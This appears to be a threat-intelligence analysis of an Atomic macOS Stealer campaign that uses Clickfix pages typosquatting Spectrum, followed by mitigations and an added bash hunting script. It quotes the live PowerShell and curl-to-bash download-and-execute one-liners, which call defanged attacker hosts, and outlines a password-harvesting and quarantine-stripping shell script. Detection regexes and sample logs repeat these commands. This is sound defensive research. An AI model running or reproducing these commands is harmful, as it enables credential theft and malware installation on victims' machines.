Executive Summary
A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.
Analysis
During a routine attacker-infrastructure discovery and attribution cycle, we discovered a number of Clickfix-themed delivery websites typosquatting Spectrum, a US-based company providing cable television, internet access, internet security, managed services, mobile phone, and unified communications services.


When the victim clicks on “Alternative Verification”, a command is copied to the clipboard and instructions are displayed for the victim to follow, just like any other Clickfix campaign.

However, upon investigating further, we discovered that the website returned different clipboard payloads depending on the User-Agent header of the request.
Clipboard - non-macOS User-Agent
powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ
This is one of the most commonly used delivery methods for Windows users: PowerShell fetches a second-stage script into %TEMP% and runs it with the execution policy bypassed. The comment after the # is padded with Hangul Filler characters (U+3164), which render as blank space, so that when the line is pasted into the Run dialog the victim mostly sees empty space and the word Cloudflare rather than the powershell invocation.
Clipboard - macOS User-Agent
/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.
/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.
curl -fsSL <URL>:
- -f: Fail silently on HTTP errors.
- -s: Silent mode (no progress output).
- -S: Show error if -s is used and the request fails.
- -L: Follow redirects.
- It downloads the contents of the script hosted at https://applemacios[.]com/getrur/install.sh.
The output of curl (i.e., the install.sh script) is substituted into the -c argument by $(...) and executed immediately by Bash. The script is never written to disk, so there is no file for Gatekeeper or a quarantine check to inspect. The trailing comment about a Cloudflare-authenticated "MacOS Verification" is inert shell syntax whose only purpose is to make the pasted line look like a legitimate verification step.
Contents of install.sh

Password Harvesting:
- Gets current user: username=$(whoami)
- Password prompt loop: repeatedly prompts "System Password:" until a password is accepted
- Password validation: runs dscl . -authonly against the local directory node to verify the password; the loop only exits once the real login password has been entered, so the attacker never ends up with a wrong value
- Password storage: writes the validated password to /tmp/.pass
Download & Execution:
- Downloads payload: curl -o /tmp/update https://applemacios[.]com/getrur/update
- Removes quarantine: feeds the stolen password to sudo -S xattr -c on the downloaded file, which clears all extended attributes, including com.apple.quarantine. Files fetched with command-line curl do not carry the quarantine attribute in the first place, so the practical effect of this step is to confirm that the harvested password works for sudo.
- Makes executable: chmod +x /tmp/update
- Executes malware: runs the downloaded file /tmp/update
Analyzing the file dropped as /tmp/update, we determined that it belongs to the Atomic macOS Stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey have been seen in the wild lately and are gaining traction among cybercriminals.
Attribution

While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian-speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs in addition to the IOCs.
The delivery pages for this AMOS variant campaign contained inaccuracies in both their programming and front-end logic. For Linux User-Agents, the PowerShell command was copied to the clipboard. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.
IOCs & IOFAs
Impact
- Corporate Credential Compromise: By harvesting macOS user passwords, attackers can gain access to corporate systems, VPNs, and internal resources, potentially enabling lateral movement.
- Abuse of Built-in Utilities: The first stage uses only native, signed utilities (curl, dscl, sudo, xattr) rather than a custom dropper, so nothing in it is malicious code that a signature-based antivirus would flag. Detection has to come from behaviour: a user shell feeding dscl . -authonly, password-driven sudo, and a freshly downloaded binary executing from /tmp.
- Initial Access for Broader Intrusions: Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.
Mitigations
- User Awareness Training: Educate employees and users about password-stealing tactics, especially those disguised as system verification prompts.
- macOS Endpoint Hardening: Keep System Integrity Protection and Gatekeeper enabled and use MDM policies to restrict what standard users can run from Terminal. Note that a curl-to-bash one-liner never passes through Gatekeeper, so these controls must be paired with telemetry on script and process execution rather than relied on alone.
- Threat Hunting for AMOS Activity: Monitor logs and endpoints for dscl . -authonly invocations originating from a user shell, sudo -S runs that strip extended attributes from files in /tmp, execution of fresh binaries from /tmp, the /tmp/.pass artifact, and the known AMOS indicators.
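The following hunting helper is added here as an example; it is not part of the original write-up and is not code from the malware. It turns the install.sh behaviour described in the Analysis section and the hunting bullet above into two checks that can run on a host or over exported telemetry. The process-event log format it parses ("ts=... uid=... cmd=...", standing in for EDR or Endpoint Security Framework process-creation events) and the sample events embedded in it are assumptions, constructed for illustration rather than taken from a real capture; the stage patterns and artifact paths come from the analysis above.

```bash
#!/bin/bash
# Hunting helper for the chain described in this write-up:
# Clickfix one-liner -> install.sh password loop -> /tmp/update.
# Added example, not code from the original post or from the malware.
# Assumed for illustration (not from the page): the log format
# "ts=<time> uid=<n> cmd=<command line>", a stand-in for EDR / Endpoint
# Security telemetry, and the constructed sample events below.
# The stage patterns and artifact paths come from the analysis.

# Stage patterns (extended regexes), in the order install.sh performs them.
STAGE1='/bin/bash -c .*curl -fsSL'   # clipboard one-liner: curl output fed to bash
STAGE2='dscl \. -authonly'           # password validated against the local directory node
STAGE3='sudo -S xattr -c /tmp/'      # xattrs stripped from the drop using the stolen password
STAGE4='cmd=/tmp/update( |$)'        # dropped payload started as its own process

# scan_process_log FILE: print "STAGE<n> matched: <first matching event>" for
# every stage present in FILE, then one VERDICT line. Three or more stages
# count as the full chain, two as suspicious, otherwise clean.
scan_process_log() {
  n=1
  seen=0
  for pat in "$STAGE1" "$STAGE2" "$STAGE3" "$STAGE4"; do
    if grep -E "$pat" "$1" >/dev/null 2>&1; then
      echo "STAGE$n matched: $(grep -E "$pat" "$1" | head -n1)"
      seen=$((seen + 1))
    fi
    n=$((n + 1))
  done
  case "$seen" in
    3|4) echo "VERDICT chain ($seen/4 stages)" ;;
    2)   echo "VERDICT suspicious ($seen/4 stages)" ;;
    *)   echo "VERDICT clean ($seen/4 stages)" ;;
  esac
}

# check_artifacts [ROOT]: report the on-disk artifacts install.sh leaves behind.
# ROOT (default: the live filesystem) lets the same check run against a
# mounted image or a test directory.
check_artifacts() {
  root="${1:-}"
  for f in "$root/tmp/.pass" "$root/tmp/update"; do
    [ -e "$f" ] && echo "ARTIFACT $f"
  done
  return 0
}

# Constructed sample telemetry (not a real capture) showing the complete chain.
# The quoted heredoc delimiter keeps "$(curl ...)" from being expanded here.
SAMPLE_LOG="$(mktemp)"
cat >"$SAMPLE_LOG" <<'EOF'
ts=2025-06-10T14:02:11Z uid=501 cmd=/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"
ts=2025-06-10T14:02:13Z uid=501 cmd=dscl . -authonly jsmith <redacted>
ts=2025-06-10T14:02:14Z uid=501 cmd=curl -o /tmp/update https://applemacios[.]com/getrur/update
ts=2025-06-10T14:02:15Z uid=501 cmd=sudo -S xattr -c /tmp/update
ts=2025-06-10T14:02:15Z uid=501 cmd=chmod +x /tmp/update
ts=2025-06-10T14:02:16Z uid=501 cmd=/tmp/update
ts=2025-06-10T14:05:00Z uid=501 cmd=ls -la /tmp
EOF

scan_process_log "$SAMPLE_LOG"   # expected: STAGE1..STAGE4 matched, VERDICT chain (4/4 stages)
check_artifacts                  # checks the live /tmp of the host running the script
rm -f "$SAMPLE_LOG"
```

On a real host the sudo stage is also visible in the system log, since sudo records the COMMAND it ran, while the dscl and /tmp/update stages need process-execution telemetry from an EDR or Endpoint Security client. The correlation here is deliberately simple (stage presence anywhere in the file); in production you would key it on the same uid or session and a short time window, because dscl . -authonly on its own also appears in legitimate administration scripts.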
References